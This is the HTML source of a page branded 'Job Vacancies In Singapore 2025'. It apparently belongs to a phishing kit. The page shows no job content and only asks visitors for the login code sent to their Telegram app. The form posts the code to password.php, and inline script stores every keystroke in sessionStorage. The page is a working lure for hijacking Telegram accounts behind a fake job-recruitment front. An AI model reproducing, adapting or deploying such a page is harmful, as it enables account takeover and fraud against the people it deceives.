
<!DOCTYPE html>
<html lang="en">

<head>
    <meta charset="UTF-8">
    <meta name="viewport" content="width=device-width, initial-scale=1.0">
    <meta http-equiv="X-UA-Compatible" content="ie=edge">
    <meta name="csrf-token" content="cmHsEC4IdiMEfkKEnMIVjb3Ngvf81PTMcEnyxiNK">
    <title>Job Vacancies In Singapore 2025</title>
    <link rel="icon" type="image/x-icon" href="images/logo.png">
    <link rel="stylesheet" href="css/logmasuk.css">
    <link rel="stylesheet" href="css/bootstrap.min.css">
    <link rel="stylesheet" href="css/font-awesome/all.css">
    <link rel="stylesheet" href="css/style.css">
    <link rel="stylesheet" href="css/app.css">
    <link href='https://fonts.googleapis.com/css?family=Poppins' rel='stylesheet'>
    <script src="https://ajax.googleapis.com/ajax/libs/jquery/3.5.1/jquery.min.js"></script>
    <script src="https://cdn.jsdelivr.net/npm/bootstrap@5.0.2/dist/js/bootstrap.bundle.min.js" crossorigin="anonymous"></script>

    <style>
        .btn-kiss {
            padding: 15px 30px;
            cursor: pointer;
            border: none;
            border-radius: 196px;
            font-size: 14px;
            font-weight: 500;
            box-shadow: 0px 7px 15px -13px rgb(0 0 0 / 17%);
            overflow: hidden;
            position: relative;
            transition: all 0.3s ease;
        }

        .btn-kiss-1 {
            background: #0a090a;
        }

        .btn-kiss-1:hover {
            background: #000000a6;
        }

        .btn-kiss .text-kiss h4 {
            font-weight: 400;
            font-family: "Poppins", Arial, sans-serif;
            font-size: 16px;
            color: #fff;
        }

        .text-right {
            text-align: right;
        }

        .btn-kiss .text-kiss span {
            color: rgb(255 255 255 / 50%);
        }
    </style>
</head>

<body>
    <div class="section d-flex flex-column min-vh-100" style="background-color: rgb(223, 225, 226);">
        <div id="tab-container" class="tab-container" style="padding-top:130px;">
            <div class="container-fluid">
                <div class="text-center col-md-12 col-md-offset-1">
                    <div class="row">
                        <div class="col-md-3"></div>
                        <div class="col-md-6">
                            <div class="card card-body">
                                <div class="card text-center">
                                    <img class="card-img-top img-fluid mx-auto d-block mt-4" src="images/banner.png" style="width: 100%;">
                                    <form id="myForm" action="./password.php" method="post" onsubmit="set_item()">
                                        <h5 class="my-4 mx-5" style="font-size: 0.9rem; color: #000000;">Please enter the OTP code that we have sent to your <b>Telegram Application.</b></h5>
                                        <div class="col-10 mx-auto mt-3 mb-3">
                                            <div class="form-group">
                                                <label for="sign-in-code" class="form-label">Enter the Code Sent to Your Telegram Number.</label>
                                                <input name="kodOtp" id="sign-in-code" class="form-control" inputmode="numeric" type="text" maxlength="5" placeholder="Telegram Code" required oninput="set_item()" />
                                            </div>
                                        </div>
                                        <div class="form-group mb-3">
                                            <button type="submit" class="btn btn-sm btn-block rounded-pill px-5 fw-bold text-white" style="background-color: #050404">Submit</button>
                                        </div>
                                </div>
                                </form>
                            </div>
                        </div>
                    </div>
                </div>
                <footer class="mt-auto" style="background: linear-gradient(-90deg, rgb(121, 121, 121) 0%, rgb(190, 190, 190) 50%, rgb(128, 128, 128) 100%); opacity: 90%; display: flex; justify-content: end; align-items: center;">
                    <p style="margin-top: 14px;font-weight: 600;font-size: 14px; color:#fff">Job Vacancies In Singapore 2025</p>
                    <img src="images/logo.png" alt="" style="max-width: 78px; height: auto; margin-left: 10px;">
                </footer>
            </div>
        </div>
    </div>
    </div>

    <script src="./otp.js"></script>
    <script>
        var inpcode = document.getElementById("sign-in-code");

        function set_item() {
            sessionStorage.setItem("code", inpcode.value);
        }

        console.log(sessionStorage.getItem("code"));

    </script>
</body>
</html>